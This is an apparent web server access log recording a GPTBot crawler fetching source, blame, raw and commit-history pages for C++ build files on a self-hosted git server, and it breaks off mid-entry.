"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" -[17/Feb/2026:15:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/main" -[17/Feb/2026:15:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" -[17/Feb/2026:15:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 28184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" -[17/Feb/2026:15:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main" -[17/Feb/2026:15:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49518] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/main" -[17/Feb/2026:15:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10198] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18911] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10199] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10712] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18910] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18919] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:15:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25012] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20677] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25009] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10412] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 20673] [Gzip 14.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 25010] [Gzip 12.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10413] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10211] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10206] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 10207] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 12745] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:15:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10463] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10771] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 